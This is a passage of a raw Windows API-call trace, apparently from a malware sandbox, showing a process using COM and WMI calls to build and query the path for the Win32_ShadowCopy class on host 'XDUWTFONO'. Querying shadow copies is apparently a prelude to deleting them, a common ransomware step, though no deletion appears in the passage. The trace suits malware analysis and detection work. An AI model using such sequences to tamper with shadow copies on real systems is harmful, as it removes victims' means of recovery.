ppvObject=0x1c64bf10 | out: ppvObject=0x1c64bf10*=0x0) returned 0x80004002 [0109.473] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1800, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bef8 | out: ppvObject=0x1c64bef8*=0x1c8f4ae0) returned 0x0 [0109.473] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ae0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64be00 | out: ppvObject=0x1c64be00*=0x1c8f4ae0) returned 0x0 [0109.473] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ae0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64be80 | out: ppvObject=0x1c64be80*=0x0) returned 0x80004002 [0109.473] WbemDefPath:IUnknown:AddRef (This=0x1c8f4ae0) returned 0x3 [0109.473] CoGetContextToken (in: pToken=0x1c64bad0 | out: pToken=0x1c64bad0) returned 0x0 [0109.473] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ae0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ba90 | out: ppvObject=0x1c64ba90*=0x1b796b40) returned 0x0 [0109.474] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b796b40, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64bac0 | out: pCid=0x1c64bac0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.474] WbemDefPath:IUnknown:Release (This=0x1b796b40) returned 0x3 [0109.474] CoGetContextToken (in: pToken=0x1c64baa0 | out: pToken=0x1c64baa0) returned 0x0 [0109.474] WbemDefPath:IUnknown:AddRef (This=0x1c8f4ae0) returned 0x4 [0109.474] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ae0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bbb8 | out: ppvObject=0x1c64bbb8*=0x0) returned 0x80004002 [0109.474] WbemDefPath:IUnknown:Release (This=0x1c8f4ae0) returned 0x3 [0109.474] WbemDefPath:IUnknown:Release (This=0x1c8f4ae0) returned 0x2 [0109.474] WbemDefPath:IUnknown:Release (This=0x1c8f1800) returned 0x0 [0109.474] WbemDefPath:IUnknown:Release (This=0x1c8f4ae0) returned 0x1 [0109.474] CoGetContextToken (in: pToken=0x1c64c7d0 | out: pToken=0x1c64c7d0) returned 0x0 [0109.474] CoGetContextToken (in: pToken=0x1c64c710 | out: pToken=0x1c64c710) returned 0x0 [0109.474] WbemDefPath:IUnknown:AddRef (This=0x1c8f4ae0) returned 0x2 [0109.475] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ae0, riid=0x1c64c850*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c830 | out: ppvObject=0x1c64c830*=0x1c8f4ae0) returned 0x0 [0109.475] WbemDefPath:IUnknown:Release (This=0x1c8f4ae0) returned 0x2 [0109.475] WbemDefPath:IUnknown:Release (This=0x1c8f4ae0) returned 0x1 [0109.475] CoGetContextToken (in: pToken=0x1c64c950 | out: pToken=0x1c64c950) returned 0x0 [0109.475] CoGetContextToken (in: pToken=0x1c64c890 | out: pToken=0x1c64c890) returned 0x0 [0109.475] WbemDefPath:IUnknown:AddRef (This=0x1c8f4ae0) returned 0x2 [0109.475] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ae0, riid=0x1c64c9d0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c9b0 | out: ppvObject=0x1c64c9b0*=0x1c8f4ae0) returned 0x0 [0109.475] WbemDefPath:IUnknown:Release (This=0x1c8f4ae0) returned 0x2 [0109.475] WbemDefPath:IUnknown:AddRef (This=0x1c8f4ae0) returned 0x3 [0109.475] WbemDefPath:IWbemPath:SetText (This=0x1c8f4ae0, uMode=0x4, pszPath="root\\cimv2") returned 0x0 [0109.475] WbemDefPath:IUnknown:Release (This=0x1c8f4ae0) returned 0x2 [0109.475] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f6ec0, puCount=0x1c64cc70 | out: puCount=0x1c64cc70*=0x0) returned 0x0 [0109.475] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f4ae0, puCount=0x1c64cc70 | out: puCount=0x1c64cc70*=0x2) returned 0x0 [0109.475] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f4ae0, lFlags=16, puBuffLength=0x1c64cc70*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cc70*=0xb, pszText=0x0) returned 0x0 [0109.475] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f4ae0, lFlags=16, puBuffLength=0x1c64cc70*=0xb, pszText="0000000000" | out: puBuffLength=0x1c64cc70*=0xb, pszText="root\\cimv2") returned 0x0 [0109.476] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x1c8f6ec0) returned 0x0 [0109.476] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f4ae0, puCount=0x1c64ccd0 | out: puCount=0x1c64ccd0*=0x2) returned 0x0 [0109.479] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f4ae0, uIndex=0x0, puNameBufLength=0x1c64ccd0*=0x0, pName=0x0 | out: puNameBufLength=0x1c64ccd0*=0x5, pName=0x0) returned 0x0 [0109.479] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f4ae0, uIndex=0x0, puNameBufLength=0x1c64ccd0*=0x5, pName="0000" | out: puNameBufLength=0x1c64ccd0*=0x5, pName="root") returned 0x0 [0109.480] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1c8f6ec0, uIndex=0x0, pszName="root") returned 0x0 [0109.480] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f4ae0, uIndex=0x1, puNameBufLength=0x1c64ccd0*=0x0, pName=0x0 | out: puNameBufLength=0x1c64ccd0*=0x6, pName=0x0) returned 0x0 [0109.480] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f4ae0, uIndex=0x1, puNameBufLength=0x1c64ccd0*=0x6, pName="00000" | out: puNameBufLength=0x1c64ccd0*=0x6, pName="cimv2") returned 0x0 [0109.480] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1c8f6ec0, uIndex=0x1, pszName="cimv2") returned 0x0 [0109.480] WbemDefPath:IWbemPath:GetClassName (in: This=0x1c8f6ec0, puBuffLength=0x1c64cd10*=0x0, pszName=0x0 | out: puBuffLength=0x1c64cd10*=0x0, pszName=0x0) returned 0x8004103a [0109.482] WbemDefPath:IWbemPath:SetClassName (This=0x1c8f6ec0, Name="Win32_ShadowCopy") returned 0x0 [0109.482] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f6ec0, puCount=0x1c64cd90 | out: puCount=0x1c64cd90*=0x2) returned 0x0 [0109.482] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f6ec0, lFlags=4, puBuffLength=0x1c64cd90*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cd90*=0x28, pszText=0x0) returned 0x0 [0109.482] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f6ec0, lFlags=4, puBuffLength=0x1c64cd90*=0x28, pszText="000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cd90*=0x28, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy") returned 0x0 [0109.482] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__SERVER", lFlags=0, pVal=0x1c64cc80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cc7c*=0, plFlavor=0x1c64cc78*=0 | out: pVal=0x1c64cc80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c64cc7c*=8, plFlavor=0x1c64cc78*=64) returned 0x0 [0109.482] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0109.482] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64cc80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cc7c*=8, plFlavor=0x1c64cc78*=64 | out: pVal=0x1c64cc80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64cc7c*=8, plFlavor=0x1c64cc78*=64) returned 0x0 [0109.482] SysStringLen (param_1="root\\cimv2") returned 0xa [0109.483] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__CLASS", lFlags=0, pVal=0x1c64cc80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cc7c*=8, plFlavor=0x1c64cc78*=64 | out: pVal=0x1c64cc80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64cc7c*=8, plFlavor=0x1c64cc78*=64) returned 0x0 [0109.483] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0109.483] CoGetObjectContext (in: riid=0x1c64cb28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cb20 | out: ppv=0x1c64cb20*=0x212498) returned 0x0 [0109.483] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64cb40 | out: pAptType=0x1c64cb40*=1) returned 0x0 [0109.483] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64cc48 | out: ppvObject=0x1c64cc48*=0x0) returned 0x80004002 [0109.483] IUnknown:Release (This=0x212498) returned 0x1 [0109.484] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c1b0 | out: ppv=0x1c64c1b0*=0x1c8f1920) returned 0x0 [0109.484] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1920, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64bec0 | out: ppvObject=0x1c64bec0*=0x0) returned 0x80004002 [0109.484] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1920, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bea8 | out: ppvObject=0x1c64bea8*=0x1c8f4ed0) returned 0x0 [0109.485] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ed0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bdb0 | out: ppvObject=0x1c64bdb0*=0x1c8f4ed0) returned 0x0 [0109.485] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ed0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64be30 | out: ppvObject=0x1c64be30*=0x0) returned 0x80004002 [0109.485] WbemDefPath:IUnknown:AddRef (This=0x1c8f4ed0) returned 0x3 [0109.485] CoGetContextToken (in: pToken=0x1c64ba80 | out: pToken=0x1c64ba80) returned 0x0 [0109.485] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ed0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ba40 | out: ppvObject=0x1c64ba40*=0x1b796cc0) returned 0x0 [0109.485] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b796cc0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64ba70 | out: pCid=0x1c64ba70*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.486] WbemDefPath:IUnknown:Release (This=0x1b796cc0) returned 0x3 [0109.486] CoGetContextToken (in: pToken=0x1c64ba50 | out: pToken=0x1c64ba50) returned 0x0 [0109.486] WbemDefPath:IUnknown:AddRef (This=0x1c8f4ed0) returned 0x4 [0109.486] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ed0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bb68 | out: ppvObject=0x1c64bb68*=0x0) returned 0x80004002 [0109.486] WbemDefPath:IUnknown:Release (This=0x1c8f4ed0) returned 0x3 [0109.486] WbemDefPath:IUnknown:Release (This=0x1c8f4ed0) returned 0x2 [0109.486] WbemDefPath:IUnknown:Release (This=0x1c8f1920) returned 0x0 [0109.486] WbemDefPath:IUnknown:Release (This=0x1c8f4ed0) returned 0x1 [0109.487] CoGetContextToken (in: pToken=0x1c64c780 | out: pToken=0x1c64c780) returned 0x0 [0109.487] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0109.487] WbemDefPath:IUnknown:AddRef (This=0x1c8f4ed0) returned 0x2 [0109.487] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ed0, riid=0x1c64c800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c7e0 | out: ppvObject=0x1c64c7e0*=0x1c8f4ed0) returned 0x0 [0109.487] WbemDefPath:IUnknown:Release (This=0x1c8f4ed0) returned 0x2 [0109.487] WbemDefPath:IUnknown:Release (This=0x1c8f4ed0) returned 0x1 [0109.487] CoGetContextToken (in: pToken=0x1c64c900 | out: pToken=0x1c64c900) returned 0x0 [0109.487] CoGetContextToken (in: pToken=0x1c64c840 | out: pToken=0x1c64c840) returned 0x0 [0109.487] WbemDefPath:IUnknown:AddRef (This=0x1c8f4ed0) returned 0x2 [0109.487] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4ed0, riid=0x1c64c980*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c960 | out: ppvObject=0x1c64c960*=0x1c8f4ed0) returned 0x0 [0109.487] WbemDefPath:IUnknown:Release (This=0x1c8f4ed0) returned 0x2 [0109.487] WbemDefPath:IUnknown:AddRef (This=0x1c8f4ed0) returned 0x3 [0109.488] WbemDefPath:IWbemPath:SetText (This=0x1c8f4ed0, uMode=0x4, pszPath="") returned 0x0 [0109.488] WbemDefPath:IUnknown:Release (This=0x1c8f4ed0) returned 0x2 [0109.488] CoGetObjectContext (in: riid=0x1c64cb28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cb20 | out: ppv=0x1c64cb20*=0x212498) returned 0x0 [0109.488] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64cb40 | out: pAptType=0x1c64cb40*=1) returned 0x0 [0109.488] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64cc48 | out: ppvObject=0x1c64cc48*=0x0) returned 0x80004002 [0109.488] IUnknown:Release (This=0x212498) returned 0x1 [0109.489] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c1b0 | out: ppv=0x1c64c1b0*=0x1c8f1920) returned 0x0 [0109.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1920, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64bec0 | out: ppvObject=0x1c64bec0*=0x0) returned 0x80004002 [0109.489] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1920, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bea8 | out: ppvObject=0x1c64bea8*=0x1c8f4fd0) returned 0x0 [0109.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4fd0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bdb0 | out: ppvObject=0x1c64bdb0*=0x1c8f4fd0) returned 0x0 [0109.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4fd0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64be30 | out: ppvObject=0x1c64be30*=0x0) returned 0x80004002 [0109.490] WbemDefPath:IUnknown:AddRef (This=0x1c8f4fd0) returned 0x3 [0109.490] CoGetContextToken (in: pToken=0x1c64ba80 | out: pToken=0x1c64ba80) returned 0x0 [0109.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4fd0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ba40 | out: ppvObject=0x1c64ba40*=0x1b796d00) returned 0x0 [0109.490] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b796d00, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64ba70 | out: pCid=0x1c64ba70*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.490] WbemDefPath:IUnknown:Release (This=0x1b796d00) returned 0x3 [0109.490] CoGetContextToken (in: pToken=0x1c64ba50 | out: pToken=0x1c64ba50) returned 0x0 [0109.490] WbemDefPath:IUnknown:AddRef (This=0x1c8f4fd0) returned 0x4 [0109.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4fd0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bb68 | out: ppvObject=0x1c64bb68*=0x0) returned 0x80004002 [0109.490] WbemDefPath:IUnknown:Release (This=0x1c8f4fd0) returned 0x3 [0109.490] WbemDefPath:IUnknown:Release (This=0x1c8f4fd0) returned 0x2 [0109.491] WbemDefPath:IUnknown:Release (This=0x1c8f1920) returned 0x0 [0109.491] WbemDefPath:IUnknown:Release (This=0x1c8f4fd0) returned 0x1 [0109.491] CoGetContextToken (in: pToken=0x1c64c780 | out: pToken=0x1c64c780) returned 0x0 [0109.491] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0109.491] WbemDefPath:IUnknown:AddRef (This=0x1c8f4fd0) returned 0x2 [0109.491] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4fd0, riid=0x1c64c800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c7e0 | out: ppvObject=0x1c64c7e0*=0x1c8f4fd0) returned 0x0 [0109.491] WbemDefPath:IUnknown:Release (This=0x1c8f4fd0) returned 0x2 [0109.491] WbemDefPath:IUnknown:Release (This=0x1c8f4fd0) returned 0x1 [0109.491] CoGetContextToken (in: pToken=0x1c64c900 | out: pToken=0x1c64c900) returned 0x0 [0109.491] CoGetContextToken (in: pToken=0x1c64c840 | out: pToken=0x1c64c840) returned 0x0 [0109.491] WbemDefPath:IUnknown:AddRef (This=0x1c8f4fd0) returned 0x2 [0109.491] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f4fd0, riid=0x1c64c980*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c960 | out: ppvObject=0x1c64c960*=0x1c8f4fd0) returned 0x0 [0109.491] WbemDefPath:IUnknown:Release (This=0x1c8f4fd0) returned 0x2 [0109.492] WbemDefPath:IUnknown:AddRef (This=0x1c8f4fd0) returned 0x3 [0109.492] WbemDefPath:IWbemPath:SetText (This=0x1c8f4fd0, uMode=0x4, pszPath="") returned 0x0 [0109.492] WbemDefPath:IUnknown:Release (This=0x1c8f4fd0) returned 0x2 [0109.492] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f4fd0, puCount=0x1c64cc20 | out: puCount=0x1c64cc20*=0x0) returned 0x0 [0109.492] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f4ed0, puCount=0x1c64cc20 | out: puCount=0x1c64cc20*=0x0) returned 0x0 [0109.492] WbemDefPath:IWbemPath:GetClassName (in: This=0x1c8f4fd0, puBuffLength=0x1c64ccc0*=0x0, pszName=0x0 | out: puBuffLength=0x1c64ccc0*=0x0, pszName=0x0) returned 0x8004103a [0109.492] WbemDefPath:IWbemPath:GetServer (in: This=0x1c8f4fd0, puNameBufLength=0x1c64ccc0*=0x0, pName=0x0 | out: puNameBufLength=0x1c64ccc0*=0x0, pName=0x0) returned 0x80041009 [0109.492] WbemDefPath:IWbemPath:SetServer (This=0x1c8f4fd0, Name="XDUWTFONO") returned 0x0 [0109.492] CoGetObjectContext (in: riid=0x1c64cb28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cb20 | out: ppv=0x1c64cb20*=0x212498) returned 0x0 [0109.492] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64cb40 | out: pAptType=0x1c64cb40*=1) returned 0x0 [0109.492] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64cc48 | out: ppvObject=0x1c64cc48*=0x0) returned 0x80004002 [0109.492] IUnknown:Release (This=0x212498) returned 0x1 [0109.492] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c1b0 | out: ppv=0x1c64c1b0*=0x1c8f1940) returned 0x0 [0109.493] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1940, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64bec0 | out: ppvObject=0x1c64bec0*=0x0) returned 0x80004002 [0109.493] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1940, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bea8 | out: ppvObject=0x1c64bea8*=0x1c8f50d0) returned 0x0 [0109.493] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f50d0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bdb0 | out: ppvObject=0x1c64bdb0*=0x1c8f50d0) returned 0x0 [0109.493] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f50d0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64be30 | out: 